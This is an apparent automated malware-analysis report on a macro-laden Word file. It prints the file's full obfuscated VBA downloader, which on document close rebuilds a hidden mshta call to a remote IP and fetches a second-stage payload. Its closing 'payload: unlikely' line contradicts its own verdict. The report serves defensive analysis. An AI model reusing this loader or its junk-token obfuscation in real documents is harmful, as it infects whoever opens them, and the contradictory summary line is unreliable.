Verdict: MALICIOUS
Risk Score: 322

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample triggers a critical heuristic for an obfuscated auto-exec VBA loader that ends in CreateObject and Shell execution. At run time the VBA code reconstructs a URL, 'http://198.55.107.156/oIoPcquwTUpZAIoPcquwTUpZA/qnMuSHVEzXdYOTyZDTXLFuTVNkTzUFOxBTVXIoPcquwTUpZA.php?uOTyZDTXLFuTVIoPcquwTUpZAJkSfdBfuUEAF=hond', and the COM ProgID 'WScript.Shell' by stripping junk tokens with Replace; applying the Replace chain visible in the extracted macro yields 'mshta http://198.55.107.156/omm/stem.php?utma=hond', which is handed to WScript.Shell.Run with a hidden window. This is the shape of a downloader attempting to execute a second-stage payload. ClamAV also detects the file as 'Doc.Malware.Emooodldr-6711604-0'.
Heuristics (7):
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, 4 related findings) [OOXML_VBA]: Document contains a VBA project (VBA macros present)
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Auto_Close macro (high) [OLE_VBA_AUTOCLOSE]: the document carries an Auto_Close macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: the macro source contains a CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OOXML body / shared strings); all are standard OOXML namespace URIs, and the downloader URL is not among them because it only exists after the macro's Replace chain runs:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2625 bytes | c340ed3609ea63348e4179eff23b5abcb94f4379b4f56ae70002461b17c1aa60 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub leguminoso()
iAIVVWi = 347 - 1491 - 1540 - 143 - 386 - 292
TWdPXROCbK = 41 + 1595 + 711 + 1286 + 658 + 1099 + 1320 + 1970
MxHpnAPPjRDG = Trim("b") & Trim("z")
osmotico = "IoPcquwTUpZAqnMuSHVEzXdYhOTyZDTXLFuTVJkSfdBfuUEAF hOTyZDTXLFuTVOTyZDTXLFuTVp://198.55.107.156/oIoPcquwTUpZAIoPcquwTUpZA/qnMuSHVEzXdYOTyZDTXLFuTVNkTzUFOxBTVXIoPcquwTUpZA.php?uOTyZDTXLFuTVIoPcquwTUpZAJkSfdBfuUEAF=hond"
osmotico = Replace(osmotico, "IoPcquwTUpZA", "m")
osmotico = Replace(osmotico, "JkSfdBfuUEAF", "a")
dxFZDFbznnd = 983 - 220 - 1511 - 1941
osmotico = Replace(osmotico, "qnMuSHVEzXdY", "s")
CTUiJIKZ = Trim("P") & "N" & "F" & Trim("k") & Trim("f")
osmotico = Replace(osmotico, "OTyZDTXLFuTV", "t")
osmotico = Replace(osmotico, "NkTzUFOxBTVX", "e")
osmotico = Replace(osmotico, "YWxpjIZqvPcP", "l")
maestro = "WScripBgbAyHVcGXKY.ShddPpkMJIOXiufPMRgGIgVUQLfPMRgGIgVUQL"
maestro = Replace(maestro, "TZyCTQPSqXYE", "m")
ETjdzTpuZG = "Q" & Trim("Q") & Trim("U") & "G" & Trim("b")
ZcokbQB = 194 + 1781 + 82 + 839 + 981
maestro = Replace(maestro, "FJiIIPjNOdZd", "a")
maestro = Replace(maestro, "cUVEIWoOoPvI", "s")
maestro = Replace(maestro, "BgbAyHVcGXKY", "t")
dFRIzrNPGXB = Trim("C") & Trim("F") & "g" & "L"
SQyFLwLn = 1485 - 1100 - 1573 - 1678
maestro = Replace(maestro, "ddPpkMJIOXiu", "e")
UAHUbfRjCiiT = Trim("i") & "B" & "N"
maestro = Replace(maestro, "fPMRgGIgVUQL", "l")
xfUTVSGn = 1652 + 8 + 1808 + 763
JSjLEYzEYoER = 1967 + 1040 + 405
zWBKgkIYBA = Trim("T") & "R" & Trim("x")
CreateObject(maestro).Run osmotico, 0
REYMTWwiV = "K" & "o" & Trim("F")
xRXCxcOFSA = Trim("w") & "U" & "f" & "W"
pfGIuDvQ = 700 + 1421 + 1269 + 1050 + 1256 + 1567
UNJVVuR = 1249 - 523
KCfffCYj = "M" & "c" & Trim("W") & Trim("k")
End Sub
Sub AutoClose()
niDGEwIwc = 1805 + 956 + 1222 + 192 + 386
SErdSdXoAK = 253 + 220 + 209 + 57 + 537 + 860 + 174
ZdizDKqqAvSr = 342 + 765 + 839
EFZoHOcgzJ = "O" & Trim("n") & Trim("d")
WjzUFjfpwo = 1326 + 61 + 1646 + 43
QFvYjDAB = 1318 + 828 + 1528 + 723 + 1406 + 1755
Application.Run "leguminoso"
DCrZCONcVI = "M" & Trim("q") & Trim("U")
ncfopYzWqr = 844 + 1771 + 755
AvTUcUgEPMgS = 631 + 1180 + 1680 + 656 + 1068 + 1816 + 1234 + 597 + 1615
oBUzCpLKJd = Trim("E") & "o" & Trim("g") & Trim("T") & Trim("B")
kCuzrXYukwB = "g" & Trim("f") & "T"
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes | 30a6bb6fe5578d7a69c2d7c9bab72c81352ba736824e23a659c9e3b64ea66942 |
Detection
- ClamAV: Doc.Malware.Emooodldr-6711604-0
- Obfuscation or payload: unlikely